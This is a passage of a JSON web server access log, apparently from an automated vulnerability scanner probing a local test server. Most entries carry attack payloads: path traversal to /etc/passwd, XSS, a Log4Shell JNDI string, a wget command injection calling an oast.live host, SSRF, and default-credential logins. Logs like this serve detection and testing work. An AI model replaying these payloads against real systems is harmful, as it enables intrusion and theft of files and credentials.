HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=&action=edit&f1=.//./\x5C.//./\x5C.//./\x5C.//./\x5C.//./\x5C.//./etc/passwd&restore=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"----------------------------835846770881083140190633\x0D\x0AContent-Disposition: form-data; name=\x22editormd-image-file\x22; filename=\x22test.<>php\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0A\x0D\x0A----------------------------835846770881083140190633--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?s=/home/page/uploadImg HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%82%9Dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /qvisdvr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"j_username=weblogic&j_password=weblogic123&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../..//etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/56 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\x22%20onmouseover=alert(document.domain)// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /security.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpversion.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29KD225cdkceIMBJ4QBH95AbNuC/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"action=verify-haras","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/rpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%83%BCexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /calendarix/admin/cal_login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/initializers/secret_token.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"j_username=admin&j_password=12345678&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/57 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"{\x22username\x22:\x22user\x22,\x22password\x22:\x22pass\x22,\x22remember\x22:\x22${jndi:ldap://${hostName}.ca28fg0smpvbd3qg07h0fwpshmemeisho.oast.live}\x22,\x22strict\x22:true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/manage/account/login?redirect=%2Fmanage", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /community/?foro=signin&redirect_to=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /time.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29KD225cdkceIMBJ4QBH95AbNuC/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"username=guacadmin&password=guacadmin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/tokens HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=http://0177.0.0.1/server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /calendar_form.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /routes/error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"target_addr=\x221.1.1.1+`wget+http%3A%2F%2Fca28fg0smpvbd3qg07h0cedhju17swei1.oast.live%2F`\x22&waninf=127.0.0.1\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boaform/admin/formTracert HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/diag_ping_admin_en.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%EF%BD%B0example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hsqldb%0a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /calendar/admin/cal_login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"j_username=admin&j_password=security&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/58 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /about/../tree?action=get HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"type=url&data=http%3A%2F%2Fca28fg0smpvbd3qg07h065uihipkunu34.oast.live%2F&xmlaction=preview&node=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 